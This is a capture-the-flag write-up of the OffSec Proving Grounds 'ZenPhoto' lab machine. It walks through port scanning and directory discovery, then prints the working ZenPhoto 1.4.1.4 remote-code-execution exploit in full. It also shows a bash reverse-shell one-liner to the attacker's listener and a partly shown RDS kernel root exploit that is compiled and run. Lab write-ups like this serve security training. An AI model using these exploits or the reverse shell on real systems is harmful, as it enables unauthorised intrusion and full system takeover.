ZenPhoto
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.206.41
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-08 12:46 EST
Nmap scan report for 192.168.206.41
Host is up, received reset ttl 61 (0.12s latency).
Scanned at 2025-11-08 12:46:29 EST for 68s
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAIM3Qmxj/JapoH/Vg/pl8IAj0PTqw5Fj5rnhI+9Q0XT5tej5pHpUZoWTmbQKIwA7QBoTWtk4Hnonhkv5We43VXz0abBEvy3allgjf13cvxc96KX0bE7Bb8PhVCQJJBDTIz44koJhvFuSO/
sauL9j+lzaUltVMR6/bZbigTINrV4nAAAAFQCvlVi2Us40FGWv8TILJYOR/LJvcwAAAIAHpp8VGuPUA5BowTa55myGr/lGs0xTFXbxFm0We4/D5v3L9kUVgv6MIVL4jweRmXFYvei7YZDGikoe6OjF9PFtSkKriEaGqav6hOER3t
mtWChQfMlaNwiZfNJzKHBc4EqeCX4jpLLUxCZAEjwoE0koQRoFcbr+gywBNOQgtrfv+QAAAIA8v2C1COdjtNl4Bp3+XVLOkbYPIpedQXCgTLgRloa5wQZCaZimgE3+txqTQSb7Vp0B+LfjKdqcMFia8g9i+0YC+b69NimiFaZXU8
euBoh/GXNo8K2vFHF3yznq6KNPG4+EW3WfaLGqJWkBJM2bb1nJ0YaJZhpOInv2Gsanh4CHOA==
| 2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA7aKskCBM7hdQEibRza0Y1BAiJ0prjECzVow5/txHOHb+Ynokd1ByaBw5roKsOExD3h7d7VGjNVKNqSwB+SBHSRivJaEgCtiV3F/5Q1qdBpehE4zyv7whG9GKeALeNk05icqXCk
9kveUsreZyqEqN+c9p3Ed29jTD+6Alc7mml/Zev0EQs7hFfX/kYiV6V4KnQuQ7HXe3kzbMA9WB3yxtp0saBB5zlu4eWGsvyvCibP41ce81LtwkJDSXTr0LwBNYgZOD07GWW//BkOuJvHtKbWPqBievO0yubQxGbz0r7vID3a5DQM
j4ZTGrAQPCunaJkGlvZs2zftrUh/BMxQSFLw==
23/tcp open ipp syn-ack ttl 61 CUPS 1.4
|_http-server-header: CUPS/1.4
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
80/tcp open http syn-ack ttl 61 Apache httpd 2.2.14 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.14 (Ubuntu)
3306/tcp open mysql syn-ack ttl 61 MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>SSH (20):
We can not access it because we do not have valid credentials.
? (23):
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ telnet 192.168.206.41 23
Trying 192.168.206.41...
Connected to 192.168.206.41.
Escape character is '^]'.
asdf
Connection closed by foreign host.Nothing.
MySQL (3306):
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ mysql -h 192.168.206.41
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.45.174' is not allowed to connect to this MySQL serverWe can not access it from an external IP address.
HTTP (80):
Also nothing, lets run gobuster to try to identify any hidden directories:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ gobuster dir -u http://192.168.206.41 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.206.41
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 291]
/.hta (Status: 403) [Size: 286]
/.htaccess (Status: 403) [Size: 291]
/cgi-bin/ (Status: 403) [Size: 290]
/index (Status: 200) [Size: 75]
/index.html (Status: 200) [Size: 75]
/server-status (Status: 403) [Size: 295]
/test (Status: 301) [Size: 315] [--> http://192.168.206.41/test/]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
===============================================================We have a hidden directory named test:
Here we can see it is powered by zenphoto.
Lets view the source code:
We will get the version of the running application.
Search for any public exploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ searchsploit zenphoto 1.4.1.4
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution | php/webapps/18083.php
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ searchsploit zenphoto 1.4.1
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution | php/webapps/18083.php
ZenPhoto 1.4.10 - Local File Inclusion | php/webapps/38841.txt
ZenPhoto 1.4.11 - Remote File Inclusion | php/webapps/39571.txt
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No ResultsCopy the one with RCE:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ searchsploit -m php/webapps/18083.php
Exploit: ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
URL: https://www.exploit-db.com/exploits/18083
Path: /usr/share/exploitdb/exploits/php/webapps/18083.php
Codes: OSVDB-76928, CVE-2011-4825
Verified: True
File Type: PHP script, ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/ZenPhoto/18083.phpRead that script:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ cat 18083.php
<?php
<snipped>
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");
fwrite($sock, $packet);
return stream_get_contents($sock);
}
print "\n+-----------------------------------------------------------+";
print "\n| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /zenphoto/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nzenphoto-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
?>Exploitation:
Lets run that script and pass the IP and the web root endpoint of the target:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
Usage......: php 18083.php <host> <path>
Example....: php 18083.php localhost /
Example....: php 18083.php localhost /zenphoto/
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php 192.168.206.41 /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# whoami
www-dataWe confirmed we have remote command execution.
Lets get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ nc -nlvp 80
listening on [any] 80 ...┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php 192.168.206.41 /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# bash -c 'bash -i >& /dev/tcp/192.168.45.174/80 0>&1'
[-] Exploit failed!┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.206.41] 35026
bash: no job control in this shell
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ python -c 'import pty;pty.spawn("/bin/bash")'
<ins/ajaxfilemanager/inc$ python -c 'import pty;pty.spawn("/bin/bash")'
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ export TERM=xterm
export TERM=xterm
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ ^Z
zsh: suspended nc -nlvp 80
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ stty -a
speed 38400 baud; rows 43; columns 172; line = 0;
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 80
www-data@offsecsrv:/var/www/test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ stty rows 43 columns 172
www-data@offsecsrv:/var/www/test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc$Post-Exploitaion:
After doing some local enumeration, we will find that the version of the kernel of the operating system is old:
www-data@offsecsrv:/dev/shm$ uname -a
Linux offsecsrv 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
www-data@offsecsrv:/dev/shm$ cat /etc/issue
Ubuntu 10.04.3 LTS \n \lIf we searched online we will find that github repo:
We will find our version in one of the rds exploit versions:
Lets click on that rds blue word:
I will use one of the scripts:
www-data@offsecsrv:/dev/shm$ cat exploit.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
<snipped>
printf("[*] Got root!\n");
execl("/bin/sh", "sh", NULL);
}Compile it and execute it:
www-data@offsecsrv:/dev/shm$ gcc exploit.c -o exploit
www-data@offsecsrv:/dev/shm$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
rootWe are root.
Get the flags:
# cd /root
# ls -la
total 44
drwx------ 5 root root 4096 Nov 8 12:45 .
drwxr-xr-x 22 root root 4096 Aug 2 2024 ..
-rw------- 1 root root 0 Sep 8 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 23 2010 .bashrc
drwx------ 2 root root 4096 Nov 9 2011 .cache
-rw------- 1 root root 42 Nov 9 2011 .lesshst
-rw------- 1 root root 27 Nov 9 2011 .mysql_history
-rw-r--r-- 1 root root 140 Apr 23 2010 .profile
drwxr-xr-x 2 root root 4096 Nov 9 2011 .ssh
drwxr-xr-x 2 root root 4096 Jul 19 2011 .wapi
-r-------- 1 root root 5 Nov 9 2011 mysqlpass
-r-------- 1 root root 33 Nov 8 17:46 proof.txt
# cat proof.txt
b336e3feac22b637e39527b05a7ce36d
# cat /home/local.txt
af91f62b7736a472c1eed2899ef7b7ffLast updated